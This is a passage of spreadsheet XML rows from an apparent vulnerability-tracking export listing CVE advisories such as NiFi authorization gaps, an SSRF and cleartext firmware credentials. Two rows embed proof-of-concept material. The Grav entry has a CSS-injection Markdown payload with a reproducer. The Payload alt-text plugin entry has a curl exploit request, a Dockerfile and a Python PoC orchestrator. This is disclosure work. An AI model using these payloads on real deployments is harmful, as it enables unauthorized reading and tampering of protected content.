      <c r="M1458" s="5" t="inlineStr"/>
      <c r="N1458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1458" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1458" s="5" t="inlineStr"/>
      <c r="Q1458" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1458" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi 2.9.0 through 2.11.0 provide Connector configuration update and verification REST API methods that do not enforce authorization checking on Assets and Secrets referenced in proposed configuration. Updating or verifying a Connector configuration step can apply Asset and Secret references, but framework authorization was limited to write privileges on the Connector itself. As a result of the missing authorization, an authenticated user authorized to modify a Connector, but not authorized to read a referenced Parameter Provider, could apply Secret values backed by that Parameter Provider. The same methods also accepted Asset identifiers without verifying that the Asset belonged to the Connector being configured. Apache NiFi installations that do not implement different levels of authorization across Connectors and Parameter Providers are not subject to this vulnerability, because the framework enforces write permissions on the Connector as the security boundary. Upgrading to Apache NiFi 2.12.0 is the recommended mitigation, which authorizes read access to referenced Parameter Providers and verifies Connector ownership of referenced Assets during configuration update and verification.</t>
        </is>
      </c>
      <c r="S1458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81866</t>
        </is>
      </c>
    </row>
    <row r="1459">
      <c r="A1459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1459" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-56563</t>
        </is>
      </c>
      <c r="D1459" s="5" t="inlineStr"/>
      <c r="E1459" s="5" t="inlineStr"/>
      <c r="F1459" s="5" t="inlineStr"/>
      <c r="G1459" s="5" t="inlineStr"/>
      <c r="H1459" s="5" t="inlineStr"/>
      <c r="I1459" s="5" t="inlineStr"/>
      <c r="J1459" s="5" t="inlineStr"/>
      <c r="K1459" s="5" t="inlineStr"/>
      <c r="L1459" s="5" t="inlineStr"/>
      <c r="M1459" s="5" t="inlineStr"/>
      <c r="N1459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1459" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1459" s="5" t="inlineStr"/>
      <c r="Q1459" s="5" t="inlineStr"/>
      <c r="R1459" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery vulnerability exists in sat_proxy.php in Zenith Satellite Tracker 1.0. The script accepts an attacker-controlled address URL parameter and passes it to curl_setopt(CURLOPT_URL) without host or scheme validation. An unauthenticated remote attacker can leverage this to make arbitrary HTTP and HTTPS requests from the server to internal networks or cloud metadata services, potentially obtaining sensitive information or pivoting to further attacks.</t>
        </is>
      </c>
      <c r="S1459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-56563</t>
        </is>
      </c>
    </row>
    <row r="1460">
      <c r="A1460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1460" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-56565</t>
        </is>
      </c>
      <c r="D1460" s="5" t="inlineStr"/>
      <c r="E1460" s="5" t="inlineStr"/>
      <c r="F1460" s="5" t="inlineStr"/>
      <c r="G1460" s="5" t="inlineStr"/>
      <c r="H1460" s="5" t="inlineStr"/>
      <c r="I1460" s="5" t="inlineStr"/>
      <c r="J1460" s="5" t="inlineStr"/>
      <c r="K1460" s="5" t="inlineStr"/>
      <c r="L1460" s="5" t="inlineStr"/>
      <c r="M1460" s="5" t="inlineStr"/>
      <c r="N1460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1460" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1460" s="5" t="inlineStr"/>
      <c r="Q1460" s="5" t="inlineStr"/>
      <c r="R1460" s="5" t="inlineStr">
        <is>
          <t>DD-WRT firmware, as deployed on TP-Link TL-WR740N v1 through v4 hardware, stores sensitive authentication credentials in cleartext within non-volatile memory. The exposed material includes SSH private keys, dynamic DNS passwords, email notification credentials and administrative passwords. An attacker with physical access to the device can extract these credentials from an SPI flash dump, leading to device compromise, infiltration of the connected network and unauthorised access to dependent third-party services.</t>
        </is>
      </c>
      <c r="S1460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-56565</t>
        </is>
      </c>
    </row>
    <row r="1461">
      <c r="A1461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1461" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-56566</t>
        </is>
      </c>
      <c r="D1461" s="5" t="inlineStr"/>
      <c r="E1461" s="5" t="inlineStr"/>
      <c r="F1461" s="5" t="inlineStr"/>
      <c r="G1461" s="5" t="inlineStr"/>
      <c r="H1461" s="5" t="inlineStr"/>
      <c r="I1461" s="5" t="inlineStr"/>
      <c r="J1461" s="5" t="inlineStr"/>
      <c r="K1461" s="5" t="inlineStr"/>
      <c r="L1461" s="5" t="inlineStr"/>
      <c r="M1461" s="5" t="inlineStr"/>
      <c r="N1461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1461" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1461" s="5" t="inlineStr"/>
      <c r="Q1461" s="5" t="inlineStr"/>
      <c r="R1461" s="5" t="inlineStr">
        <is>
          <t>MikroTik firmware 7.19.4 stores sensitive authentication credentials and network state in cleartext within non-volatile storage. An attacker with physical access to the device can extract this material from an SPI flash dump, without authenticating to the device and without knowledge of the administrative password.</t>
        </is>
      </c>
      <c r="S1461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-56566</t>
        </is>
      </c>
    </row>
    <row r="1462">
      <c r="A1462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38999</t>
        </is>
      </c>
      <c r="D1462" s="5" t="inlineStr"/>
      <c r="E1462" s="5" t="inlineStr"/>
      <c r="F1462" s="5" t="inlineStr"/>
      <c r="G1462" s="5" t="inlineStr"/>
      <c r="H1462" s="5" t="inlineStr"/>
      <c r="I1462" s="5" t="inlineStr"/>
      <c r="J1462" s="5" t="inlineStr"/>
      <c r="K1462" s="5" t="inlineStr"/>
      <c r="L1462" s="5" t="inlineStr"/>
      <c r="M1462" s="5" t="inlineStr"/>
      <c r="N1462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1462" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1462" s="5" t="inlineStr"/>
      <c r="Q1462" s="5" t="inlineStr"/>
      <c r="R1462" s="5" t="inlineStr">
        <is>
          <t>A Null Pointer Dereference in the mk_sched_event_close function (mk_server/mk_scheduler.c) of Monkey through commit 4fb0c16 allows attackers to cause a Denial of Service (DoS) via sending a crafted HTTP request to the server.</t>
        </is>
      </c>
      <c r="S1462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38999</t>
        </is>
      </c>
    </row>
    <row r="1463">
      <c r="A1463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51990</t>
        </is>
      </c>
      <c r="D1463" s="5" t="inlineStr"/>
      <c r="E1463" s="5" t="inlineStr"/>
      <c r="F1463" s="5" t="inlineStr"/>
      <c r="G1463" s="5" t="inlineStr"/>
      <c r="H1463" s="5" t="inlineStr"/>
      <c r="I1463" s="5" t="inlineStr"/>
      <c r="J1463" s="5" t="inlineStr"/>
      <c r="K1463" s="5" t="inlineStr"/>
      <c r="L1463" s="5" t="inlineStr"/>
      <c r="M1463" s="5" t="inlineStr"/>
      <c r="N1463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1463" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1463" s="5" t="inlineStr"/>
      <c r="Q1463" s="5" t="inlineStr"/>
      <c r="R1463" s="5" t="inlineStr">
        <is>
          <t>An issue in Sogou Sogou Input Method &lt; 16.3.0.3498 (fixed in 16.3.0.3498) allows a remote attacker to execute arbitrary code via the biz_helper.exe component</t>
        </is>
      </c>
      <c r="S1463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51990</t>
        </is>
      </c>
    </row>
    <row r="1464">
      <c r="A1464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1464" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58657</t>
        </is>
      </c>
      <c r="D1464" s="5" t="inlineStr"/>
      <c r="E1464" s="5" t="inlineStr"/>
      <c r="F1464" s="5" t="inlineStr"/>
      <c r="G1464" s="5" t="inlineStr"/>
      <c r="H1464" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1464" s="5" t="inlineStr"/>
      <c r="J1464" s="5" t="inlineStr"/>
      <c r="K1464" s="5" t="inlineStr"/>
      <c r="L1464" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M1464" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N1464" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1464" s="5" t="inlineStr"/>
      <c r="P1464" s="5" t="inlineStr"/>
      <c r="Q1464" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1464" s="5" t="inlineStr">
        <is>
          <t>## Summary
Grav 2.0.0-rc.9 and the current 2.0 branch still allow stored CSS injection through Markdown image media actions. The prior media hardening rejects direct `?style=` payloads and unsafe `attribute()` fallbacks, but the adjacent `resize()` action still writes caller-controlled values directly into `styleAttributes`.
A publisher who can edit page Markdown can store a crafted image URL that renders additional CSS declarations in the final `&lt;img style=...&gt;` attribute. This crosses the same lower-privileged publisher to higher-privileged reviewer/admin rendered-content boundary as the earlier media style and attribute advisories.
## Impact
A lower-privileged content editor can persist CSS declarations that are rendered when a higher-privileged user views the page or admin preview. The demonstrated payload creates a full-viewport fixed overlay by injecting `position:fixed`, viewport dimensions, background color, and z-index declarations.
This does not require JavaScript execution. The impact is stored CSS injection in rendered content, with UI redress/overlay and content-manipulation risk in higher-privileged sessions.
## Reproduction
Tested versions:
- Grav 2.0 branch commit `6582166173bb8eb5869d96aea384e0e73777c94c`
- Grav `2.0.0-rc.9` commit `e03d29aa0d3ece16d73c1ffccfa78df8bf5f28b8`
Minimal Markdown payload:
```markdown
![logo](image.png?resize=100;position:fixed;top:0;left:0;width:100vw;height:100vh;background:white;z-index:9999,200)
```
A minimal PHPUnit-style reproducer can drive the same parser path directly:
```php
$m = new class {
    use \Grav\Common\Media\Traits\MediaObjectTrait;
    use \Grav\Common\Media\Traits\StaticResizeTrait;
    public function addMetaFile($filepath) {}
    public function __toString(): string { return ''; }
    public function url($reset = true) { return '/img.png'; }
    public function get($name, mixed $default = null, $separator = null) { return $default; }
    public function set($name, mixed $value, $separator = null) { return $this; }
    protected function createThumbnail($thumb) { return null; }
    protected function createLink(array $attributes) { return null; }
    protected function getItems(): array { return []; }
};
$excerpts = new \Grav\Common\Page\Markdown\Excerpts(null, ['markdown' =&gt; [], 'images' =&gt; []]);
$m = $excerpts-&gt;processMediaActions(
    $m,
    'image.png?resize=100;position:fixed;top:0;left:0;width:100vw;height:100vh;background:white;z-index:9999,200'
);
$element = $m-&gt;parsedownElement('', '', '', '', false);
var_dump($element['attributes']['style']);
```
Observed style attribute:
```text
width: 100;position:fixed;top:0;left:0;width:100vw;height:100vh;background:white;z-index:9999px;height: 200px;
```
The appended `px` lands on the final `z-index` value, but the preceding injected declarations remain syntactically valid CSS.
## Root Cause / Technical Details
`system/src/Grav/Common/Page/Markdown/Excerpts.php::processMediaActions()` parses the image query string into media actions and invokes the requested public media method with `call_user_func_array([$medium, $action['method']], $args)`.
For `resize()`, `system/src/Grav/Common/Media/Traits/StaticResizeTrait.php::resize()` stores width and height directly into style attributes:
```php
$this-&gt;styleAttributes['width'] = $width . 'px';
$this-&gt;styleAttributes['height'] = $height . 'px';
```
It does not verify that the values are numeric, length-only, or free of CSS declaration delimiters. Later, `system/src/Grav/Common/Media/Traits/MediaObjectTrait.php::parsedownElement()` serializes keyed style attributes as raw CSS declarations:
```php
$style .= $key . ': ' . $value . ';';
```
The sanitizer added for direct `style()` inputs is not reached for values introduced by `resize()`. As a result, `resize=100;position:fixed;...,200` breaks out of the intended `width:` value and injects additional declarations.
## PoC Evidence
On both current 2.0 and 2.0.0-rc.9, the targeted regression test produced the injected style string above. Existing tests still confirm the direct `style()` and `attribute()` paths are rejected; the bypass is specific to the adjacent `resize()` styleAttributes path.
## Remediation
Sanitize or type-normalize all values before they enter `styleAttributes`, not only values passed through `MediaObjectTrait::style()`. For `resize()`, cast or validate width and height as numeric values before appending `px`, or use a shared CSS declaration builder that rejects semicolons, colons, property names, and other declaration-breaking characters. Add regression coverage for `resize=100;position:fixed;top:0,200` and any other media action that writes to `styleAttributes` directly.</t>
        </is>
      </c>
      <c r="S1464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58657</t>
        </is>
      </c>
    </row>
    <row r="1465">
      <c r="A1465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59739</t>
        </is>
      </c>
      <c r="D1465" s="5" t="inlineStr"/>
      <c r="E1465" s="5" t="inlineStr"/>
      <c r="F1465" s="5" t="inlineStr"/>
      <c r="G1465" s="5" t="inlineStr"/>
      <c r="H1465" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1465" s="5" t="inlineStr"/>
      <c r="J1465" s="5" t="inlineStr"/>
      <c r="K1465" s="5" t="inlineStr"/>
      <c r="L1465" s="5" t="inlineStr"/>
      <c r="M1465" s="5" t="inlineStr"/>
      <c r="N1465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1465" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1465" s="5" t="inlineStr"/>
      <c r="Q1465" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1465" s="5" t="inlineStr">
        <is>
          <t>Information disclosure via SetWatches reconnect replay in Apache ZooKeeper due to missing ACL check. An attacker can discover ACL-restricted paths by registering exists-watches on non-existent paths, then reconnecting after the paths are created with restricted ACLs. Issue is caused by incomplete fix for CVE-2024-23944 (ZOOKEEPER-4799). The fix added ACL checking to WatchManager.triggerWatch(). However, DataTree.setWatches() — the SetWatches/SetWatches2 reconnect replay handler — still calls watcher.process(event) with null ACL, bypassing the check entirely. It's important to note that only the path is exposed by this vulnerability, not the data of znode, but since znode path can contain sensitive information like user name or login ID, this issue is potentially critical.
Users are recommended to upgrade to version 3.9.6, 3.8.7 which fixes the issue.</t>
        </is>
      </c>
      <c r="S1465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59739</t>
        </is>
      </c>
    </row>
    <row r="1466">
      <c r="A1466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1466" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59965</t>
        </is>
      </c>
      <c r="D1466" s="5" t="inlineStr"/>
      <c r="E1466" s="5" t="inlineStr"/>
      <c r="F1466" s="5" t="inlineStr"/>
      <c r="G1466" s="5" t="inlineStr"/>
      <c r="H1466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1466" s="5" t="inlineStr"/>
      <c r="J1466" s="5" t="inlineStr"/>
      <c r="K1466" s="5" t="inlineStr"/>
      <c r="L1466" s="5" t="inlineStr">
        <is>
          <t>npm:@jhb.software/payload-alt-text-plugin</t>
        </is>
      </c>
      <c r="M1466" s="5" t="inlineStr">
        <is>
          <t>0.8.0</t>
        </is>
      </c>
      <c r="N1466" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1466" s="5" t="inlineStr"/>
      <c r="P1466" s="5" t="inlineStr"/>
      <c r="Q1466" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1466" s="5" t="inlineStr">
        <is>
          <t>## Alt Text Endpoint Authorization Bypass via Payload Local API `overrideAccess` Omission
### Summary
`@jhb.software/payload-alt-text-plugin` v0.7.0 exposes custom Payload CMS endpoints (`POST /api/alt-text-plugin/generate` and `/bulk`) that call the Payload Local API (`findByID` and `update`) without setting `overrideAccess: false`. Because Payload's internal logic evaluates `shouldOverrideAccess = overrideAccess !== false`, omitting the parameter causes it to default to `true`, silently bypassing all collection-level access control functions. Any authenticated user — regardless of role — can read and overwrite the `alt` and `keywords` fields of arbitrary upload documents that would otherwise be protected by restrictive collection access rules. The vulnerability is rated **High** (CVSS 7.1).
### Details
The plugin registers two network endpoints in `alt-text/src/plugin.ts:179-186`. Their default access guard (`plugin.ts:55`) only checks `!!req.user`, meaning any authenticated session satisfies the check regardless of the role required by the underlying collection.
The endpoint handler at `alt-text/src/endpoints/generateAltText.ts` accepts user-controlled `id`, `collection`, `locale`, and `update` fields from the request body (`line 29`), then passes them directly to two unsecured Local API calls:
**Read bypass** (`generateAltText.ts:31`):
```typescript
const imageDoc = await req.payload.findByID({
  id,
  collection,
  depth: 0,
  // overrideAccess: false is absent → defaults to true
})
```
**Write bypass** (`generateAltText.ts:121`):
```typescript
await req.payload.update({
  id,
  collection,
  data: {
    alt: result.result.altText,
    keywords: result.result.keywords,
  },
  locale: targetLocale,
  // overrideAccess: false is absent → defaults to true
})
```
The bulk endpoint (`alt-text/src/endpoints/bulkGenerateAltTexts.ts`) repeats the same pattern at lines `120` (read) and `170` (write).
Payload's internal resolution of `overrideAccess` is:
```
shouldOverrideAccess = overrideAccess !== false
// undefined !== false → true → collection access function is never called
```
Because the collection-level `read` and `update` access functions are never invoked, any attacker with a valid session can target documents in any upload collection, regardless of how that collection's access is configured.
### PoC
**Environment setup:**
1. Clone the repository and install `@jhb.software/payload-alt-text-plugin@0.7.0` into a Payload v3 project.
2. Configure an upload collection named `media` with `read` and `update` access restricted to users with `role: "admin"`.
3. Configure the plugin with `collections: ["media"]` and a resolver that returns `{ success: true, result: { altText: "PWNED_BY_EXPLOIT", keywords: ["hacked", "bypass"] } }`.
4. As an admin, create a media document (e.g., ID `doc-001`) with `alt = "original safe alt text"`.
5. Obtain a session token for a non-admin user (`role: "user"`).
**Build and run the dynamic PoC (Docker):**
```bash
# Build
docker build -t vuln001-poc -f vuln-001/Dockerfile .
# Run
docker run --rm vuln001-poc
```
**Exploit request:**
```bash
curl -i -b "payload-token=&lt;LOW_PRIV_TOKEN&gt;" \
  -H "Content-Type: application/json" \
  -X POST http://localhost:3000/api/alt-text-plugin/generate \
  --data '{"collection":"media","id":"doc-001","locale":"en","update":true}'
```
**Expected result:**
- HTTP 200 is returned.
- The response body contains `"altText": "PWNED_BY_EXPLOIT"`.
- A subsequent admin read of `media/doc-001` confirms `alt = "PWNED_BY_EXPLOIT"` and `keywords = ["hacked", "bypass"]`, despite the collection's update access being restricted to admins.
**Control verification (confirms the bypass is real, not a misconfiguration):**
A direct Local API call with `overrideAccess: false` by the same non-admin user throws `AccessError: update denied for collection "media" (user role: user)`, proving that the access rule is correct and the plugin endpoint is the vector.
**Dynamic reproduction output (Phase 2 confirmed):**
```
VULN-001: Alt Text endpoint authorization bypass
  Payload Local API overrideAccess omission in
  generateAltText.ts:31 and :121
[Step 1] Control: non-admin direct update with overrideAccess:false
  PASS: access correctly denied → AccessError
[Step 3] EXPLOIT: non-admin calls POST /api/alt-text-plugin/generate
  HTTP status : 200
  Response    : {"id":"doc-001","collection":"media","altText":"PWNED_BY_EXPLOIT","keywords":["hacked","bypass"]}
VULNERABILITY CONFIRMED — EXPLOITATION SUCCESSFUL
```
### Impact
This is an **Incorrect Authorization** vulnerability (CWE-863). The plugin's endpoints act as an authorization bypass tunnel into Payload's Local API. Any authenticated user — a subscriber, editor, or any low-privilege role — can:
1. **Read** the content of arbitrary upload documents that collection access rules would otherwise deny them.
2. **Overwrite** the `alt` text and `keywords` fields on those documents, effectively performing unauthorized content modification.
Operators who restrict upload collection access by role (a common production pattern) are fully impacted. Attackers do not need admin credentials; any valid session suffices. The vulnerability is exploitable on all default deployments where the plugin is enabled, with no special configuration required on the attacker's side.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001 dynamic reproduction
#
# Build context: the parent directory that contains both
#   repo/          (jhb-software/payload-plugins clone)
#   vuln-001/      (this workspace)
#
# Build:  docker build -t vuln001-poc -f vuln-001/Dockerfile .
# Run:    docker run --rm vuln001-poc
FROM node:22-slim
WORKDIR /app
# ---- Copy plugin source files required by the PoC ----
# Only the endpoint under test and its direct dependencies are needed.
# No Payload framework install required: we mock it in the PoC.
COPY repo/alt-text/src/endpoints/generateAltText.ts  ./plugin/src/endpoints/generateAltText.ts
COPY repo/alt-text/src/endpoints/schemas.ts          ./plugin/src/endpoints/schemas.ts
COPY repo/alt-text/src/utilities/mimeTypes.ts        ./plugin/src/utilities/mimeTypes.ts
COPY repo/alt-text/src/types/AltTextPluginConfig.ts  ./plugin/src/types/AltTextPluginConfig.ts
COPY repo/alt-text/src/resolvers/types.ts            ./plugin/src/resolvers/types.ts
# ---- Copy PoC files ----
COPY vuln-001/package_inner.json ./package.json
COPY vuln-001/inner_poc.ts       ./inner_poc.ts
# ---- Install minimal runtime dependencies ----
# zod: schema validation used by the endpoint handler
# tsx:  TypeScript executor that handles .js→.ts extension mapping
RUN npm install --no-audit --no-fund
# ---- Run the PoC ----
CMD ["node_modules/.bin/tsx", "inner_poc.ts"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
poc.py — VULN-001 Dynamic Reproduction Orchestrator
Vulnerability: @jhb.software/payload-alt-text-plugin v0.7.0
Title: Alt Text endpoint authorization bypass via Payload Local API overrideAccess omission
CWE: CWE-863 (Incorrect Authorization)
This script:
  1. Builds a Docker image containing the real plugin endpoint source.
  2. Runs the container, which calls the endpoint handler with a non-admin user.
  3. Captures stdout/stderr as evidence.
  4. Writes the result to phase2_result.json.
Usage:
  python3 poc.py
Safety:
  - All traffic stays on 127.0.0.1 / localhost inside Docker.
  - No external services are contacted.
  - No live credentials are used.
"""
import json
import os
import subprocess
import sys
# ---------------------------------------------------------------------------
# Paths
# ---------------------------------------------------------------------------
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
# Build context: parent directory that contains both repo/ and vuln-001/
BUILD_CONTEXT = os.path.dirname(THIS_DIR)
DOCKERFILE = os.path.join(THIS_DIR, "Dockerfile")
IMAGE_TAG = "vuln001-poc"
RESULT_FILE = os.path.join(THIS_DIR, "phase2_result.json")
BUILD_COMMAND = f"docker build -t {IMAGE_TAG} -f vuln-001/Dockerfile ."
RUN_COMMAND = f"docker run --rm {IMAGE_TAG}"
POC_COMMAND = f"python3 poc.py"
def run(cmd: list[str], cwd: str, timeout: int = 180) -&gt; tuple[int, str, str]:
    """Run a subprocess and return (returncode, stdout, stderr)."""
    result = subprocess.run(
        cmd,
        cwd=cwd,
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    return result.returncode, result.stdout, result.stderr
def write_result(passed: bool, verdict: str, reason: str, evidence: str,
                 build_out: str = "", run_out: str = "", failure_detail: str = "") -&gt; None:
    """Write phase2_result.json."""
    data: dict = {
        "passed": passed,
        "verdict": verdict,
        "reason": reason,
        "build_command": BUILD_COMMAND,
        "run_command": RUN_COMMAND,
        "poc_command": POC_COMMAND,
        "evidence": evidence,
        "artifacts": ["Dockerfile", "poc.py"],
    }
    if failure_detail:
        data["failure_detail"] = failure_detail
    if build_out:
        data["build_output_tail"] = build_out[-2000:]
    if run_out:
        data["run_output"] = run_out
    with open(RESULT_FILE, "w", encoding="utf-8") as fh:
        json.dump(data, fh, indent=2, ensure_ascii=False)
    print(f"\nResult written to: {RESULT_FILE}")
def main() -&gt; int:
    # -----------------------------------------------------------------------
    # Step 1: Build the Docker image
    # -----------------------------------------------------------------------
    print("=" * 60)
    print("VULN-001 Dynamic Reproduction")
    print("=" * 60)
    print()
    print(f"[1/2] Building Docker image: {IMAGE_TAG}")
    print(f"      Context : {BUILD_CONTEXT}")
    print(f"      Command : {BUILD_COMMAND}")
    print()
    rc, build_stdout, build_stderr = run(
        ["docker", "build", "-t", IMAGE_TAG, "-f", "vuln-001/Dockerfile", "."],
        cwd=BUILD_CONTEXT,
    )
    combined_build = (build_stdout + build_stderr).strip()
    if rc != 0:
        print("ERROR: Docker build failed.")
        print(combined_build[-3000:])
        write_result(
            passed=False,
            verdict="FAIL",
            reason="Docker 빌드 실패 — npm install 또는 파일 복사 오류",
            evidence="",
            build_out=combined_build,
            failure_detail=f"docker build exit code {rc}:\n{combined_build[-2000:]}",
        )
        return 1
    print("      Build succeeded.")
    print()
    # -----------------------------------------------------------------------
    # Step 2: Run the PoC container
    # -----------------------------------------------------------------------
    print(f"[2/2] Running PoC container")
    print(f"      Command : {RUN_COMMAND}")
    print()
    rc, run_stdout, run_stderr = run(
        ["docker", "run", "--rm", IMAGE_TAG],
        cwd=BUILD_CONTEXT,
    )
    combined_run = (run_stdout + run_stderr).strip()
    print(combined_run)
    print()
    # -----------------------------------------------------------------------
    # Step 3: Evaluate the output
    # -----------------------------------------------------------------------
    success_marker = "VULNERABILITY CONFIRMED"
    pwned_marker = "PWNED_BY_EXPLOIT"
    if rc == 0 and success_marker in combined_run and pwned_marker in combined_run:
        # Extract the key evidence block
        lines = combined_run.splitlines()
        evidence_lines = []
        in_block = False
        for line in lines:
            if success_marker in line or pwned_marker in line or "EXPLOITATION" in line:
                in_block = True
            if in_block:
                evidence_lines.append(line)
            if in_block and line.startswith("→"):
                break
        evidence = "\n".join(evidence_lines) if evidence_lines else combined_run[-1500:]
        write_result(
            passed=True,
            verdict="PASS",
            reason=(
                "비관리자(role=user) 세션이 POST /api/alt-text-plugin/generate?update=true 호출을 통해 "
                "admin 전용 컬렉션의 문서 필드(alt, keywords)를 임의 수정하는 것을 실제 엔드포인트 코드 실행으로 확인. "
                "generateAltText.ts:121에서 payload.update()가 overrideAccess:false 없이 호출되어 "
                "Payload Local API의 기본 shouldOverrideAccess = undefined !== false → true 로직에 의해 "
                "컬렉션 레벨 access 함수가 우회됨. "
                "직접 update(overrideAccess:false) 호출은 AccessError로 차단되지만 플러그인 엔드포인트 경유 시 성공."
            ),
            evidence=evidence,
            run_out=combined_run,
        )
        print("PASS — vulnerability dynamically confirmed.")
        return 0
    else:
        print("FAIL — success marker not found or container exited non-zero.")
        write_result(
            passed=False,
            verdict="FAIL" if rc != 0 else "INCOMPLETE",
            reason=(
                f"컨테이너 종료 코드 {rc}. "
                "성공 마커(VULNERABILITY CONFIRMED)가 출력에서 발견되지 않음. "
                "로그를 확인하여 원인 파악 필요."
            ),
            evidence=combined_run[-2000:],
            run_out=combined_run,
            failure_detail=f"Container exit code: {rc}\nstdout+stderr:\n{combined_run}",
        )
        return 1
if __name__ == "__main__":
    sys.exit(main())
```</t>
        </is>
      </c>
      <c r="S1466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59965</t>
        </is>
      </c>
    </row>
    <row r="1467">
      <c r="A1467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59969</t>
        </is>
      </c>
      <c r="D1467" s="5" t="inlineStr"/>
      <c r="E1467" s="5" t="inlineStr"/>
      <c r="F1467" s="5" t="inlineStr"/>
      <c r="G1467" s="5" t="inlineStr"/>
      <c r="H1467" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1467" s="5" t="inlineStr"/>
      <c r="J1467" s="5" t="inlineStr"/>
      <c r="K1467" s="5" t="inlineStr"/>
      <c r="L1467" s="5" t="inlineStr"/>
      <c r="M1467" s="5" t="inlineStr"/>
      <c r="N1467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1467" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1467" s="5" t="inlineStr"/>
      <c r="Q1467" s="5" t="inlineStr">
